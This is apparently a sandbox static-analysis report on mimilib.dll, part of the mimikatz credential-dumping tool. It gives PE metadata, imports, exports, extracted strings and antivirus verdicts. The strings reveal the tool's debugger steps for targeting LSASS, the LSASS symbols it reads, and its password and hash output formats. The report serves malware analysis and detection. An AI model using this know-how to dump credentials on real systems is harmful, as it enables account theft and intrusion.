Static | ZeroBOX

PE Compile Time

2024-07-30 08:16:52

PE Imphash

cbfe356bef0f713dd262e4f553876b6b

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00015a70 0x00015c00 6.44088307948
.rdata 0x00017000 0x0000c232 0x0000c400 5.19171683304
.data 0x00024000 0x00001ff8 0x00000e00 1.95608784941
.pdata 0x00026000 0x00001380 0x00001400 5.05115108399
.rsrc 0x00028000 0x00000698 0x00000800 3.79291688458
.reloc 0x00029000 0x000006a0 0x00000800 4.96842901132

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x000280a0 0x000003cc LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_MANIFEST 0x00028470 0x00000224 LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators

Imports

Library ADVAPI32.dll:
0x180017000 CreateRestrictedToken
0x180017008 OpenProcessToken
0x180017010 ConvertSidToStringSidA
0x180017018 IsTextUnicode
0x180017020 CreateProcessAsUserW
Library ntdll.dll:
0x1800172f0 RtlFreeUnicodeString
0x1800172f8 RtlStringFromGUID
0x180017300 RtlEqualString
Library RPCRT4.dll:
0x1800172c0 MesHandleFree
0x1800172d0 NdrMesTypeFree2
0x1800172d8 NdrMesTypeDecode2
Library ole32.dll:
0x180017310 CoCreateInstance
Library KERNEL32.dll:
0x180017030 ReadConsoleW
0x180017038 ReadFile
0x180017040 SetEndOfFile
0x180017048 HeapReAlloc
0x180017050 HeapSize
0x180017058 WriteConsoleW
0x180017060 SetFilePointerEx
0x180017068 CreateFileW
0x180017070 GetCurrentProcess
0x180017078 CloseHandle
0x180017080 lstrlenW
0x180017088 LoadLibraryW
0x180017090 GetProcAddress
0x180017098 FreeLibrary
0x1800170a0 VirtualProtect
0x1800170a8 GetLastError
0x1800170b0 LocalAlloc
0x1800170b8 LocalFree
0x1800170c0 GetTimeFormatA
0x1800170c8 FileTimeToSystemTime
0x1800170d0 GetDateFormatA
0x1800170d8 FileTimeToLocalFileTime
0x1800170e0 RaiseException
0x1800170e8 GetSystemInfo
0x1800170f0 VirtualQuery
0x1800170f8 GetModuleHandleW
0x180017100 LoadLibraryExA
0x180017108 QueryPerformanceCounter
0x180017110 GetCurrentProcessId
0x180017118 GetCurrentThreadId
0x180017120 GetSystemTimeAsFileTime
0x180017128 InitializeSListHead
0x180017130 RtlCaptureContext
0x180017138 RtlLookupFunctionEntry
0x180017140 RtlVirtualUnwind
0x180017148 IsDebuggerPresent
0x180017150 UnhandledExceptionFilter
0x180017160 GetStartupInfoW
0x180017170 SetStdHandle
0x180017178 RtlUnwindEx
0x180017180 InterlockedFlushSList
0x180017188 SetLastError
0x180017190 EnterCriticalSection
0x180017198 LeaveCriticalSection
0x1800171a0 DeleteCriticalSection
0x1800171b0 TlsAlloc
0x1800171b8 TlsGetValue
0x1800171c0 TlsSetValue
0x1800171c8 TlsFree
0x1800171d0 LoadLibraryExW
0x1800171d8 ExitProcess
0x1800171e0 TerminateProcess
0x1800171e8 GetModuleHandleExW
0x1800171f0 GetModuleFileNameA
0x1800171f8 MultiByteToWideChar
0x180017200 WideCharToMultiByte
0x180017208 HeapFree
0x180017210 HeapAlloc
0x180017218 GetACP
0x180017220 FlushFileBuffers
0x180017228 WriteFile
0x180017230 GetConsoleCP
0x180017238 GetConsoleMode
0x180017240 GetStdHandle
0x180017248 GetFileType
0x180017250 LCMapStringW
0x180017258 FindClose
0x180017260 FindFirstFileExA
0x180017268 FindNextFileA
0x180017270 IsValidCodePage
0x180017278 GetOEMCP
0x180017280 GetCPInfo
0x180017288 GetCommandLineA
0x180017290 GetCommandLineW
0x180017298 GetEnvironmentStringsW
0x1800172a0 FreeEnvironmentStringsW
0x1800172a8 GetProcessHeap
0x1800172b0 GetStringTypeW

Exports

Ordinal Address Name
1 0x1800011e4 DhcpNewPktHook
2 0x180001134 DhcpServerCalloutEntry
3 0x180001b68 DllCanUnloadNow
4 0x180001b00 DllGetClassObject
5 0x180001284 DnsPluginCleanup
6 0x180001284 DnsPluginInitialize
7 0x180001288 DnsPluginQuery
8 0x1800031e0 ExtensionApiVersion
9 0x1800012e8 InitializeChangeNotify
10 0x180001530 Msv1_0SubAuthenticationFilter
11 0x180001530 Msv1_0SubAuthenticationRoutine
12 0x180001420 NPGetCaps
13 0x180001374 NPLogonNotify
14 0x1800012ec PasswordChangeNotify
15 0x180001514 SpLsaModeInitialize
16 0x1800031e8 WinDbgExtensionDllInit
17 0x18000324c coffee
18 0x18000325c mimikatz
19 0x180001000 startW
bcrypt.dll
AcquireSRWLockExclusive
ReleaseSRWLockExclusive
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
(null)
CorExitProcess
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
GetCurrentPackageId
InitializeCriticalSectionEx
LCMapStringEx
LocaleNameToLCID
DhcpServerCalloutEntry
CredUnPackAuthenticationBufferW
CredIsProtectedW
CredUnprotectW
Primary
CredentialKeys
[%08x] %Z
n.e. (Lecture KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)
n.e. (Lecture KIWI_MSV1_0_CREDENTIALS KO)
* Key List
[%08x]
[%08x]
* GUID :
* Time :
* MasterKey :
0x%02x,
\x%02x
null
des_plain
des_cbc_crc
des_cbc_md4
des_cbc_md5
des_cbc_md5_nt
rc4_plain
rc4_plain2
rc4_plain_exp
rc4_lm
rc4_md4
rc4_sha
rc4_hmac_nt
rc4_hmac_nt_exp
rc4_plain_old
rc4_plain_old_exp
rc4_hmac_old
rc4_hmac_old_exp
aes128_hmac_plain
aes256_hmac_plain
aes128_hmac
aes256_hmac
unknow
[ERROR] [RPC Decode] Exception 0x%08x: (%u)
[ERROR] [RPC Decode] MesIncrementalHandleReset: %08x
[ERROR] [RPC Decode] MesDecodeIncrementalHandleCreate: %08x
[ERROR] [RPC Free] Exception 0x%08x: (%u)
[ERROR] [RPC Free] MesDecodeIncrementalHandleCreate: %08x
.#####. mimikatz 2.2.0 (x64) built on Jul 29 2024 23:16:51
.## ^ ##. "A La Vie, A L'Amour" - Windows build %hu
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' https://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' WinDBG extension ! * * */
===================================
# * Kernel mode * #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
# * User mode * #
===================================
0:000> !mimikatz
===================================
UndefinedLogonType
Unknown !
Interactive
Network
Service
Unlock
NetworkCleartext
NewCredentials
RemoteInteractive
CachedInteractive
CachedRemoteInteractive
CachedUnlock
tspkg!TSGlobalCredTable
wdigest
wdigest!l_LogSessList
livessp
livessp!LiveGlobalLogonSessionList
kerberos
kerberos!KerbGlobalLogonSessionTable
msv1_0!SspCredentialList
masterkey
lsasrv!g_MasterKeyCacheList
dpapisrv!g_MasterKeyCacheList
credman
( (
) )
.______.
| |]
\ /
`----'
lsasrv!LogonSessionLeakList
lsasrv!InitializationVector
lsasrv!hAesKey
lsasrv!h3DesKey
lsasrv!LogonSessionList
lsasrv!LogonSessionListCount
kdcsvc!SecData
krbtgt keys
===========
Current
Previous
kdcsvc!KdcDomainList
Domain List
===========
SekurLSA
========
Authentication Id : %u ; %u (%08x:%08x)
Session : %s from %u
User Name : %wZ
Domain : %wZ
Logon Server : %wZ
Logon Time :
SID :
[ERROR] [LSA] Symbols
%p - lsasrv!LogonSessionListCount
%p - lsasrv!LogonSessionList
[ERROR] [CRYPTO] Acquire keys
[ERROR] [CRYPTO] Symbols
%p - lsasrv!InitializationVector
%p - lsasrv!hAesKey
%p - lsasrv!h3DesKey
[ERROR] [CRYPTO] Init
* Username : %wZ
* Domain : %wZ
* LM :
* NTLM :
* SHA1 :
* DPAPI :
* Raw data :
* Smartcard
PIN code : %wZ
Model : %S
Reader : %S
Key name : %S
Provider : %S
%s
<no size, buffer is incorrect>
Unknown version in Kerberos credentials structure
* Username : %wZ
* Domain : %wZ
* Password :
LUID KO
* RootKey :
* %08x :
* LSA Isolated Data: %.*s
Unk-Key :
Encrypted:
SS:%u, TS:%u, DS:%u
0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:
, 5:0x%x
* unkData1 :
unkData2 :
%s krbtgt:
%u credentials
* %s :
[%s]
-> %wZ
%wZ ->
from:
* %s :
Domain: %wZ (%wZ
* RSA key
PVK (private key)
DER (public key and certificate)
* Legacy key
* Unknown key (seen as %08x)
lsasrv!g_guidPreferredKey
lsasrv!g_pbPreferredKey
lsasrv!g_cbPreferredKey
lsasrv!g_guidW2KPreferredKey
lsasrv!g_pbW2KPreferredKey
lsasrv!g_cbW2KPreferredKey
lsasrv!g_fSystemCredsInitialized
lsasrv!g_rgbSystemCredMachine
lsasrv!g_rgbSystemCredUser
dpapisrv!g_guidPreferredKey
dpapisrv!g_pbPreferredKey
dpapisrv!g_cbPreferredKey
dpapisrv!g_guidW2KPreferredKey
dpapisrv!g_pbW2KPreferredKey
dpapisrv!g_cbW2KPreferredKey
dpapisrv!g_fSystemCredsInitialized
dpapisrv!g_rgbSystemCredMachine
dpapisrv!g_rgbSystemCredUser
DPAPI Backup keys
=================
Current prefered key:
Compatibility prefered key:
DPAPI System
============
full:
m/u :
bcrypt.dll
.text$mn
.text$mn$00
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCZ
.CRT$XIA
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.didat$2
.didat$3
.didat$4
.didat$6
.didat$7
.edata
.idata$2
.idata$3
.idata$4
.idata$6
.didat$5
.pdata
.rsrc$01
.rsrc$02
BCryptDestroyKey
BCryptGetProperty
BCryptDecrypt
BCryptOpenAlgorithmProvider
BCryptCloseAlgorithmProvider
BCryptSetProperty
BCryptGenerateSymmetricKey
mimilib.dll
DhcpNewPktHook
DhcpServerCalloutEntry
DllCanUnloadNow
DllGetClassObject
DnsPluginCleanup
DnsPluginInitialize
DnsPluginQuery
ExtensionApiVersion
InitializeChangeNotify
Msv1_0SubAuthenticationFilter
Msv1_0SubAuthenticationRoutine
NPGetCaps
NPLogonNotify
PasswordChangeNotify
SpLsaModeInitialize
WinDbgExtensionDllInit
coffee
mimikatz
startW
CreateProcessAsUserW
CreateRestrictedToken
OpenProcessToken
ConvertSidToStringSidA
IsTextUnicode
ADVAPI32.dll
RtlEqualString
RtlFreeUnicodeString
RtlStringFromGUID
ntdll.dll
MesHandleFree
MesDecodeIncrementalHandleCreate
MesIncrementalHandleReset
NdrMesTypeDecode2
NdrMesTypeFree2
RPCRT4.dll
CoCreateInstance
ole32.dll
GetCurrentProcess
CloseHandle
lstrlenW
LoadLibraryW
GetProcAddress
FreeLibrary
VirtualProtect
GetLastError
LocalAlloc
LocalFree
GetTimeFormatA
FileTimeToSystemTime
GetDateFormatA
FileTimeToLocalFileTime
RaiseException
GetSystemInfo
VirtualQuery
GetModuleHandleW
LoadLibraryExA
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
IsDebuggerPresent
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoW
IsProcessorFeaturePresent
KERNEL32.dll
RtlUnwindEx
InterlockedFlushSList
SetLastError
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
LoadLibraryExW
ExitProcess
TerminateProcess
GetModuleHandleExW
GetModuleFileNameA
MultiByteToWideChar
WideCharToMultiByte
HeapFree
HeapAlloc
GetACP
FlushFileBuffers
WriteFile
GetConsoleCP
GetConsoleMode
GetStdHandle
GetFileType
LCMapStringW
FindClose
FindFirstFileExA
FindNextFileA
IsValidCodePage
GetOEMCP
GetCPInfo
GetCommandLineA
GetCommandLineW
GetEnvironmentStringsW
FreeEnvironmentStringsW
GetProcessHeap
GetStringTypeW
SetStdHandle
CreateFileW
SetFilePointerEx
WriteConsoleW
HeapSize
HeapReAlloc
SetEndOfFile
ReadFile
ReadConsoleW
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
KERNEL32.DLL
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
ext-ms-
(null)
mscoree.dll
UTF-16LEUNICODE
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
api-ms-win-appmodel-runtime-l1-1-1
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-file-l2-1-1
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-synch-l1-2-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-kernel32-package-current-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernel32
user32
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
kiwidns.log
%S (%hu)
kiwifilter.log
[%08x] %wZ
kiwinp.log
[%08x:%08x] %s %wZ\%wZ
KiwiSSP
Kiwi Security Support Provider
kiwissp.log
[%08x:%08x] [%08x] %wZ\%wZ (%wZ)
kiwisub.log
%u (%u) - %wZ\%wZ (%wZ) (%hu)
kcredentialprovider.log
Credui.dll
advapi32.dll
ChainingModeCBC
ChainingMode
ObjectLength
ChainingModeCFB
(null)
%02x%s
VS_VERSION_INFO
StringFileInfo
040904b0
ProductName
mimilib (mimikatz)
ProductVersion
2.2.0.0
CompanyName
gentilkiwi (Benjamin DELPY)
FileDescription
mimilib for Windows (mimikatz)
FileVersion
2.2.0.0
InternalName
mimilib
LegalCopyright
Copyright (c) 2007 - 2021 gentilkiwi (Benjamin DELPY)
OriginalFilename
mimilib.dll
PrivateBuild
Build with love for POC only
SpecialBuild
VarFileInfo
Translation
Antivirus Signature
Bkav W64.AIDetectMalware
Lionic Trojan.Win32.Mimikatz.i!c
tehtris Clean
ClamAV Win.Tool.Mimikatz-10029462-0
CMC Clean
CAT-QuickHeal Clean
Skyhigh HTool-Mimikatz
ALYac Gen:Variant.Mimikatz.10
Cylance Unsafe
Zillya Tool.Mimikatz.Win64.2822
Sangfor HackTool.Win64.Mimikatz.uwccg
K7AntiVirus Hacktool ( 0043c1591 )
Alibaba Trojan:Win32/Mimikatz.4b1
K7GW Hacktool ( 0043c1591 )
Cybereason Clean
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win64/Riskware.Mimikatz.U
APEX Clean
Avast Win64:Malware-gen
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-PSW.Win64.Mimikatz.gen
BitDefender Gen:Variant.Mimikatz.10
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Gen:Variant.Mimikatz.10
Tencent Trojan.Win64.Mimikatz.a
TACHYON Clean
Sophos ATK/Apteryx-Gen
F-Secure Clean
DrWeb Clean
VIPRE Gen:Variant.Mimikatz.10
TrendMicro Trojan.Win64.BAZARLOADER.SMYXBIMZ
McAfeeD ti!7FDB709E4E16
Trapmine Clean
FireEye Generic.mg.ddbd4a6269c999e0
Emsisoft Gen:Variant.Mimikatz.10 (B)
SentinelOne Static AI - Malicious PE
GData Gen:Variant.Mimikatz.10
Jiangmin Clean
Webroot W32.Hacktool.Gen
Varist Clean
Avira Clean
Antiy-AVL RiskWare/Win64.Mimikatz
Kingsoft Win64.Trojan-PSW.Mimikatz.gen
Gridinsoft Virtool.Win64.Mimikatz.dd!n
Xcitium Clean
Arcabit Trojan.Mimikatz.10
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-PSW.Win64.Mimikatz.gen
Microsoft HackTool:Win64/Mikatz!dha
Google Detected
AhnLab-V3 Trojan/Win.Mimikatz.R453144
Acronis Clean
McAfee HTool-Mimikatz
MAX malware (ai score=84)
VBA32 Clean
Malwarebytes HackTool.Mimikatz
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall HKTL_MIMIKATZ64
Rising HackTool.Mimikatz!1.B3A7 (CLASSIC)
Yandex Clean
Ikarus HackTool.Mimikatz
MaxSecure Clean
Fortinet Riskware/Mimikatz
BitDefenderTheta Clean
AVG Win64:Malware-gen
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_90% (W)
alibabacloud HackTool:Win/Mimikatz.k
No IRMA results available.